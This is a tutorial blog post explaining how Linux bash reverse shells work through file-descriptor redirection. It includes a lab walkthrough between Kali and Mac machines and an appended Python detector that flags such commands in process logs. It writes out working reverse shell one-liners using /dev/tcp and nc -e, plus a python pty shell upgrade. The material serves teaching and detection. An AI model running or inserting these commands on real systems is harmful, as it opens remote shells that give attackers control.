The principle of the Linux reverse shell

Full command

Reverse shell command:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i > /dev/tcp/ip/port 0>&1 2>&1

Using nc (note that with -l, as written, this end listens for an incoming connection rather than connecting back):

nc -lvvp 12345 -t -e /bin/bash

Principle

bash -i > /dev/tcp/ip/port 0>&1 2>&1

bash -i opens an interactive bash.
The & marks the target of the redirection as a file descriptor rather than a file named 1.
>&file is shorthand for >file 2>&1, so bash -i >& /dev/tcp/ip/port sends both standard output and standard error to the socket; n>&m, where m is a digit, duplicates descriptor m onto descriptor n.
0 stands for standard input, so 0>&1 duplicates descriptor 1 (now the socket) onto descriptor 0: whatever is typed in the listening window is read as the input of the target's shell. After the shell is established there are two windows, the shell of the target machine and the listener on the attacking machine, and the command can be understood as taking the input typed in the attacker's window and feeding it to the target's shell as its input. 2 represents standard error output.

Experiment

A small experiment to make this concrete.

The first step is to redirect the shell's standard output to an external host

Suppose the command entered on Kali is:

bash -i > /dev/tcp/192.168.124.1/9999

This redirects the standard output of the interactive shell to port 9999 on 192.168.124.1.

The listener command on the Mac is: nc -l 9999

First, I entered the whoami command on Kali and found that there was no echo, because the output had been redirected to the Mac.


But when a wrong (nonexistent) command is entered on Kali, its error message is still echoed locally.

The second step is to redirect the error output to the external host as well

We only need to append 2>&1 to the command above, which redirects the error output to standard output, that is, to our external host.

At this point, pressing keys on Kali produces no echo at all, and all output appears in the Mac shell:

This is because all of the output has been redirected to the external host, but control is still on Kali: the Mac cannot send any input and can only display the output. At this point we need to hand input control over to the Mac.

The third step is to hand over input control

Just add 0>&1 to the command from the second step.


Now Kali's shell can be fully controlled from the Mac, and the experiment is complete.

Other

When the shell is unstable, use Python's pseudo-terminal to upgrade it:

python -c "import pty;pty.spawn('/bin/bash')"
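As an added example (not from the original post), here is a small Python detector that looks for the command shapes discussed on this page in process-execution records and pulls the /dev/tcp destination out as an indicator; the record format and the sample events are constructed assumptions.

```python
import re

# Constructed process-execution records (an assumed shape, not from the original post):
# what an auditd- or EDR-style collector might log as pid, user and full command line.
SAMPLE_EVENTS = [
    {"pid": 4011, "user": "www-data", "cmd": "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"},
    {"pid": 4012, "user": "root", "cmd": "nc -lvvp 12345 -t -e /bin/bash"},
    {"pid": 4013, "user": "www-data", "cmd": "python -c \"import pty;pty.spawn('/bin/bash')\""},
    {"pid": 4014, "user": "alice", "cmd": "bash -c 'cat /etc/hostname > /tmp/out.txt 2>&1'"},
    {"pid": 4015, "user": "alice", "cmd": "nc -zv 10.0.0.5 443"},
]

# bash's /dev/tcp (or /dev/udp) pseudo-path: captures protocol, host and port.
DEV_TCP = re.compile(r"/dev/(tcp|udp)/([0-9A-Za-z.\-]+)/(\d{1,5})")
# stdin duplicated onto stdout (0>&1 or 0<&1): the step that hands input to the remote side.
STDIN_DUP = re.compile(r"(^|\s)0[<>]&1(\s|$)")
# netcat started with -e, which attaches a program to the connection.
NC_EXEC = re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+\S+")
# The pty upgrade shown in the "Other" section.
PTY_SPAWN = re.compile(r"pty\.spawn\(")


def classify(cmd):
    """Return (rule name, extracted details) for a suspicious command line, else None."""
    m = DEV_TCP.search(cmd)
    if m:
        return ("bash-dev-tcp-redirect", {
            "proto": m.group(1),
            "host": m.group(2),
            "port": int(m.group(3)),
            # True when the command also redirects stdin, i.e. a fully interactive shell.
            "stdin_redirected": bool(STDIN_DUP.search(cmd)),
        })
    if NC_EXEC.search(cmd):
        return ("nc-exec-shell", {})
    if PTY_SPAWN.search(cmd):
        return ("pty-upgrade", {})
    return None


def scan(events):
    """Run classify() over every record and return one finding dict per hit."""
    findings = []
    for ev in events:
        hit = classify(ev["cmd"])
        if hit:
            findings.append({"pid": ev["pid"], "user": ev["user"], "rule": hit[0], **hit[1]})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Ordinary redirections such as 2>&1 to a local file are not flagged; only the /dev/tcp path, nc -e and pty.spawn patterns from this page produce findings.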

References:
https://www.freebuf.com/news/142195.html (converting the shell to a full tty)
https://blog.csdn.net/Auuuuuuuu/article/details/89059176
https://www.anquanke.com/post/id/87017


Origin blog.csdn.net/qq_41874930/article/details/108195810